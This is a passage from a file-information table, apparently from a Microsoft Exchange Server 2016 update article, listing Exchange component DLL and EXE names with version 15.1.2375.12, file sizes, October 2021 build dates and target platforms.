\nMicrosoft.exchange.management.reportingwebservice.eventlog.dll| 15.1.2375.12| 13,712| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.management.snapin.esm.dll| 15.1.2375.12| 71,552| 4-Oct-21| 9:45| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.1.2375.12| 1,301,392| 4-Oct-21| 9:42| x86 \nMicrosoft.exchange.management.transport.dll| 15.1.2375.12| 1,876,352| 4-Oct-21| 9:46| x86 \nMicrosoft.exchange.managementgui.dll| 15.1.2375.12| 5,225,864| 4-Oct-21| 8:26| x86 \nMicrosoft.exchange.managementmsg.dll| 15.1.2375.12| 36,232| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.1.2375.12| 117,640| 4-Oct-21| 8:11| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.1.2375.12| 209,800| 4-Oct-21| 9:43| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.1.2375.12| 79,736| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.1.2375.12| 17,296| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.1.2375.12| 156,024| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.1.2375.12| 65,912| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.1.2375.12| 30,608| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.1.2375.12| 58,248| 4-Oct-21| 9:11| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.1.2375.12| 29,560| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.1.2375.12| 175,480| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.1.2375.12| 28,560| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.1.2375.12| 75,152| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.1.2375.12| 206,216| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.1.2375.12| 440,712| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.1.2375.12| 83,344| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.1.2375.12| 35,192| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.1.2375.12| 53,112| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.1.2375.12| 96,632| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.migration.dll| 15.1.2375.12| 1,109,880| 4-Oct-21| 9:22| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.1.2375.12| 14,736| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.mitigation.service.eventlog.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.mitigation.service.exe| 15.1.2375.12| 81,800| 4-Oct-21| 9:53| x86 \nMicrosoft.exchange.mobiledriver.dll| 15.1.2375.12| 135,560| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.1.2375.12| 5,157,768| 4-Oct-21| 10:29| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.1.2375.12| 19,856| 4-Oct-21| 8:24| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.1.2375.12| 68,496| 4-Oct-21| 8:10| x86 \nMicrosoft.exchange.net.dll| 15.1.2375.12| 5,084,024| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.1.2375.12| 265,608| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.networksettings.dll| 15.1.2375.12| 37,776| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.1.2375.12| 14,200| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.1.2375.12| 549,240| 4-Oct-21| 10:18| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.1.2375.12| 22,920| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.1.2375.12| 106,360| 4-Oct-21| 9:05| x86 \nMicrosoft.exchange.oauth.core.dll| 15.1.2375.12| 291,704| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.1.2375.12| 17,296| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.1.2375.12| 277,880| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.odata.dll| 15.1.2375.12| 2,994,056| 4-Oct-21| 10:15| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.1.2375.12| 89,464| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.1.2375.12| 101,760| 4-Oct-21| 9:04| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.1.2375.12| 38,280| 4-Oct-21| 9:04| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.1.2375.12| 45,448| 4-Oct-21| 9:05| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.1.2375.12| 58,232| 4-Oct-21| 9:01| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.1.2375.12| 147,344| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.1.2375.12| 26,504| 4-Oct-21| 9:04| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.1.2375.12| 183,184| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.1.2375.12| 26,496| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.1.2375.12| 38,280| 4-Oct-21| 9:04| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.1.2375.12| 55,688| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.1.2375.12| 147,336| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.1.2375.12| 191,864| 4-Oct-21| 9:04| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.1.2375.12| 33,680| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.partitioncache.dll| 15.1.2375.12| 28,040| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.1.2375.12| 32,656| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.1.2375.12| 15,224| 4-Oct-21| 9:06| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.1.2375.12| 17,272| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.1.2375.12| 17,272| 4-Oct-21| 7:52| Not applicable \nMicrosoft.exchange.pop3.exe| 15.1.2375.12| 106,888| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.1.2375.12| 106,888| 4-Oct-21| 9:00| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.1.2375.12| 24,968| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.1.2375.12| 24,968| 4-Oct-21| 9:00| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.1.2375.12| 42,872| 4-Oct-21| 8:09| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.1.2375.12| 262,024| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.1.2375.12| 262,024| 4-Oct-21| 9:00| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.1.2375.12| 357,768| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.1.2375.12| 4,169,592| 4-Oct-21| 9:49| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.1.2375.12| 326,008| 4-Oct-21| 9:50| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.1.2375.12| 41,352| 4-Oct-21| 9:53| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.1.2375.12| 30,608| 4-Oct-21| 8:53| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.1.2375.12| 134,024| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.1.2375.12| 436,600| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.1.2375.12| 14,208| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.1.2375.12| 224,144| 4-Oct-21| 9:42| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.1.2375.12| 105,872| 4-Oct-21| 9:40| x86 \nMicrosoft.exchange.pst.dll| 15.1.2375.12| 168,824| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.1.2375.12| 168,824| 4-Oct-21| 7:47| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.1.2375.12| 259,472| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.publicfolders.dll| 15.1.2375.12| 72,056| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.1.2375.12| 215,944| 4-Oct-21| 7:48| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.1.2375.12| 106,888| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.1.2375.12| 425,360| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.1.2375.12| 70,544| 4-Oct-21| 9:01| x86 \nMicrosoft.exchange.query.analysis.dll| 15.1.2375.12| 45,960| 4-Oct-21| 9:22| x86 \nMicrosoft.exchange.query.configuration.dll| 15.1.2375.12| 206,712| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.query.core.dll| 15.1.2375.12| 163,192| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.query.ranking.dll| 15.1.2375.12| 342,392| 4-Oct-21| 9:23| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.1.2375.12| 149,384| 4-Oct-21| 9:25| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.1.2375.12| 95,112| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.1.2375.12| 127,376| 4-Oct-21| 9:12| x86 \nMicrosoft.exchange.relevance.core.dll| 15.1.2375.12| 63,352| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.relevance.data.dll| 15.1.2375.12| 36,744| 4-Oct-21| 8:41| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.1.2375.12| 17,800| 4-Oct-21| 8:07| x64 \nMicrosoft.exchange.relevance.people.dll| 15.1.2375.12| 9,666,960| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.1.2375.12| #########| 4-Oct-21| 8:09| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.1.2375.12| 36,744| 4-Oct-21| 8:10| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.1.2375.12| 97,656| 4-Oct-21| 7:47| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.1.2375.12| 28,560| 4-Oct-21| 8:07| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.1.2375.12| 72,080| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.routing.client.dll| 15.1.2375.12| 15,760| 4-Oct-21| 8:11| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.1.2375.12| 13,200| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.routing.server.exe| 15.1.2375.12| 58,768| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.rpc.dll| 15.1.2375.12| 1,681,808| 4-Oct-21| 8:09| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.1.2375.12| 209,800| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.1.2375.12| 60,296| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.1.2375.12| 517,512| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.1.2375.12| 160,656| 4-Oct-21| 8:25| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.1.2375.12| 720,776| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.1.2375.12| 243,064| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.1.2375.12| 20,880| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.1.2375.12| 35,208| 4-Oct-21| 9:42| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.1.2375.12| 42,384| 4-Oct-21| 9:01| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.1.2375.12| 56,200| 4-Oct-21| 9:41| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.1.2375.12| 27,536| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.rules.common.dll| 15.1.2375.12| 130,424| 4-Oct-21| 8:19| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.1.2375.12| 14,712| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.1.2375.12| 20,368| 4-Oct-21| 9:06| x86 \nMicrosoft.exchange.safehtml.dll| 15.1.2375.12| 21,392| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.1.2375.12| 267,640| 4-Oct-21| 7:51| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.1.2375.12| 110,992| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.1.2375.12| 112,504| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.1.2375.12| 622,480| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.1.2375.12| 162,168| 4-Oct-21| 9:22| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.1.2375.12| 12,160| 4-Oct-21| 7:54| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.1.2375.12| 19,320| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.search.core.dll| 15.1.2375.12| 209,288| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.1.2375.12| 17,808| 4-Oct-21| 9:24| x86 \nMicrosoft.exchange.search.engine.dll| 15.1.2375.12| 96,656| 4-Oct-21| 9:02| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.1.2375.12| 16,776| 4-Oct-21| 8:11| x86 \nMicrosoft.exchange.search.fast.dll| 15.1.2375.12| 435,088| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.search.files.dll| 15.1.2375.12| 274,320| 4-Oct-21| 9:07| x86 \nMicrosoft.exchange.search.flighting.dll| 15.1.2375.12| 24,952| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.search.mdb.dll| 15.1.2375.12| 218,512| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.search.service.exe| 15.1.2375.12| 26,488| 4-Oct-21| 9:04| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.1.2375.12| 162,184| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.security.dll| 15.1.2375.12| 1,555,320| 4-Oct-21| 8:54| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.1.2375.12| 19,848| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.1.2375.12| 28,536| 4-Oct-21| 7:48| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.1.2375.12| 222,600| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.1.2375.12| 1,110,912| 4-Oct-21| 8:23| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.1.2375.12| 212,344| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.1.2375.12| 113,544| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.1.2375.12| 82,832| 4-Oct-21| 8:24| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.1.2375.12| 80,784| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.1.2375.12| 66,448| 4-Oct-21| 9:01| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.1.2375.12| 81,296| 4-Oct-21| 9:12| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.1.2375.12| 207,752| 4-Oct-21| 9:04| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.1.2375.12| 1,162,104| 4-Oct-21| 9:07| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.1.2375.12| 504,176| 4-Oct-21| 9:13| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.1.2375.12| 47,504| 4-Oct-21| 9:04| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.1.2375.12| 848,272| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.1.2375.12| 1,219,960| 4-Oct-21| 8:28| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.1.2375.12| 30,584| 4-Oct-21| 8:25| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.1.2375.12| 120,200| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.1.2375.12| 1,009,016| 4-Oct-21| 9:02| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.1.2375.12| 110,984| 4-Oct-21| 9:11| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.1.2375.12| 34,688| 4-Oct-21| 8:25| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.1.2375.12| 19,344| 4-Oct-21| 7:52| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.1.2375.12| 14,712| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.servicehost.exe| 15.1.2375.12| 60,808| 4-Oct-21| 9:04| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.1.2375.12| 50,552| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.1.2375.12| 14,216| 4-Oct-21| 7:54| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.1.2375.12| 14,216| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.services.common.dll| 15.1.2375.12| 74,128| 4-Oct-21| 9:12| x86 \nMicrosoft.exchange.services.dll| 15.1.2375.12| 8,477,560| 4-Oct-21| 9:56| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.1.2375.12| 30,096| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.1.2375.12| 633,720| 4-Oct-21| 10:09| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.1.2375.12| 1,651,088| 4-Oct-21| 10:01| x86 \nMicrosoft.exchange.services.json.dll| 15.1.2375.12| 296,336| 4-Oct-21| 10:04| x86 \nMicrosoft.exchange.services.messaging.dll| 15.1.2375.12| 43,400| 4-Oct-21| 9:59| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.1.2375.12| 232,832| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.services.surface.dll| 15.1.2375.12| 178,576| 4-Oct-21| 10:07| x86 \nMicrosoft.exchange.services.wcf.dll| 15.1.2375.12| 348,536| 4-Oct-21| 10:02| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.1.2375.12| 56,720| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.1.2375.12| 98,192| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.setup.common.dll| 15.1.2375.12| 298,872| 4-Oct-21| 9:52| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.1.2375.12| 35,720| 4-Oct-21| 9:43| x86 \nMicrosoft.exchange.setup.console.dll| 15.1.2375.12| 27,024| 4-Oct-21| 9:54| x86 \nMicrosoft.exchange.setup.gui.dll| 15.1.2375.12| 117,112| 4-Oct-21| 9:54| x86 \nMicrosoft.exchange.setup.parser.dll| 15.1.2375.12| 55,176| 4-Oct-21| 9:41| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.1.2375.12| 75,152| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.1.2375.12| 142,736| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.1.2375.12| 24,976| 4-Oct-21| 8:11| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.1.2375.12| 15,240| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.sharedcache.exe| 15.1.2375.12| 58,768| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.1.2375.12| 27,024| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.1.2375.12| 46,968| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.sqm.dll| 15.1.2375.12| 46,992| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.store.service.exe| 15.1.2375.12| 28,040| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.store.worker.exe| 15.1.2375.12| 26,512| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.1.2375.12| 13,704| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.1.2375.12| 31,624| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.storeprovider.dll| 15.1.2375.12| 1,166,712| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.structuredquery.dll| 15.1.2375.12| 158,584| 4-Oct-21| 7:47| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.1.2375.12| 628,104| 4-Oct-21| 9:27| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:54| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.1.2375.12| 16,256| 4-Oct-21| 9:41| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.textprocessing.dll| 15.1.2375.12| 221,576| 4-Oct-21| 8:13| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.1.2375.12| 13,704| 4-Oct-21| 7:50| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.1.2375.12| 29,072| 4-Oct-21| 9:12| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.1.2375.12| 138,104| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.1.2375.12| 21,904| 4-Oct-21| 8:19| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.1.2375.12| 40,336| 4-Oct-21| 9:12| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.1.2375.12| 22,928| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.1.2375.12| 21,384| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.1.2375.12| 212,368| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.1.2375.12| 99,216| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.1.2375.12| 22,920| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.1.2375.12| 169,360| 4-Oct-21| 9:24| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.1.2375.12| 18,312| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.1.2375.12| 20,880| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.1.2375.12| 31,632| 4-Oct-21| 9:13| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.1.2375.12| 46,992| 4-Oct-21| 9:13| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.1.2375.12| 30,096| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.1.2375.12| 53,112| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.1.2375.12| 47,496| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.1.2375.12| 18,312| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.1.2375.12| 46,472| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.1.2375.12| 46,480| 4-Oct-21| 9:12| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.1.2375.12| 28,024| 4-Oct-21| 8:08| x86 \nMicrosoft.exchange.transport.common.dll| 15.1.2375.12| 457,080| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.1.2375.12| 18,320| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.1.2375.12| 30,584| 4-Oct-21| 8:12| x86 \nMicrosoft.exchange.transport.dll| 15.1.2375.12| 4,181,368| 4-Oct-21| 9:06| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.1.2375.12| 182,144| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.1.2375.12| 121,736| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.1.2375.12| 406,408| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.1.2375.12| 14,728| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.1.2375.12| 86,904| 4-Oct-21| 8:13| x86 \nMicrosoft.exchange.transport.logging.dll| 15.1.2375.12| 88,968| 4-Oct-21| 8:52| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.1.2375.12| 68,480| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.1.2375.12| 63,368| 4-Oct-21| 8:32| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.1.2375.12| 428,944| 4-Oct-21| 10:32| x86 \nMicrosoft.exchange.transport.net.dll| 15.1.2375.12| 121,224| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.1.2375.12| 17,800| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.1.2375.12| 29,072| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.1.2375.12| 60,296| 4-Oct-21| 9:01| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.1.2375.12| 49,528| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.1.2375.12| 33,168| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.1.2375.12| 112,520| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.1.2375.12| 18,312| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.1.2375.12| 52,112| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.transport.storage.dll| 15.1.2375.12| 672,136| 4-Oct-21| 9:00| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.1.2375.12| 21,880| 4-Oct-21| 9:10| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.1.2375.12| 17,800| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.1.2375.12| 487,304| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.1.2375.12| 12,688| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.1.2375.12| 306,056| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.1.2375.12| 15,736| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.1.2375.12| 46,472| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.1.2375.12| 1,044,344| 4-Oct-21| 9:22| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.1.2375.12| 15,240| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.1.2375.12| 18,800| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.1.2375.12| 